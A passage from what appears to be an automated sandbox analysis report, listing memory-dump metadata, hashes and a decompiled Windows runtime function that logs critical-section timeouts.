                                                          • Associated: 0000000D.00000002.919072654.0000000003ABB000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000D.00000002.919088024.0000000003ABF000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 643ccd69b3a1e7e0653cae887cdd4d208a40bff143e8402370f2eafa71e5591f
                                                          • Instruction ID: fcc4b483745ce69d663f68c961d3b5f1cd96161feee8589bd6c5a1cca37a71b8
                                                          • Opcode Fuzzy Hash: 643ccd69b3a1e7e0653cae887cdd4d208a40bff143e8402370f2eafa71e5591f
                                                          • Instruction Fuzzy Hash: FFB09B719014D5C5D611D770560C72B7D0477D0741F16C557D1020645B477CC091F5B6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          C-Code - Quality: 53%
                                                          			E03A5FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                          				void* _t7;
                                                          				intOrPtr _t9;
                                                          				intOrPtr _t10;
                                                          				intOrPtr* _t12;
                                                          				intOrPtr* _t13;
                                                          				intOrPtr _t14;
                                                          				intOrPtr* _t15;
                                                          
                                                          				_t13 = __edx;
                                                          				_push(_a4);
                                                          				_t14 =  *[fs:0x18];
                                                          				_t15 = _t12;
                                                          				_t7 = E03A0CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                          				_push(_t13);
                                                          				E03A55720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                          				_t9 =  *_t15;
                                                          				if(_t9 == 0xffffffff) {
                                                          					_t10 = 0;
                                                          				} else {
                                                          					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                          				}
                                                          				_push(_t10);
                                                          				_push(_t15);
                                                          				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                          				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                          				return E03A55720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                          			}










                                                          0x03a5fdda
                                                          0x03a5fde2
                                                          0x03a5fde5
                                                          0x03a5fdec
                                                          0x03a5fdfa
                                                          0x03a5fdff
                                                          0x03a5fe0a
                                                          0x03a5fe0f
                                                          0x03a5fe17
                                                          0x03a5fe1e
                                                          0x03a5fe19
                                                          0x03a5fe19
                                                          0x03a5fe19
                                                          0x03a5fe20
                                                          0x03a5fe21
                                                          0x03a5fe22
                                                          0x03a5fe25
                                                          0x03a5fe40

                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03A5FDFA
                                                          Strings
                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 03A5FE01
                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 03A5FE2B
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.918935858.00000000039A0000.00000040.00000001.sdmp, Offset: 039A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.919072654.0000000003ABB000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000D.00000002.919088024.0000000003ABF000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                          • API String ID: 885266447-3903918235
                                                          • Opcode ID: 8e83ac38e2b602eb191a992b83b8e17de03697eb5775a355e30470706888e058
                                                          • Instruction ID: bdf4a9e987bb4db01e22b1528d84e6ea401eaf2f19f287ab86409bfbc6504746
                                                          • Opcode Fuzzy Hash: 8e83ac38e2b602eb191a992b83b8e17de03697eb5775a355e30470706888e058
                                                          • Instruction Fuzzy Hash: FFF02B36640201BFDA209B45DD02F63BF6AEB85730F240716FA685A6D1DA72F87087F0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%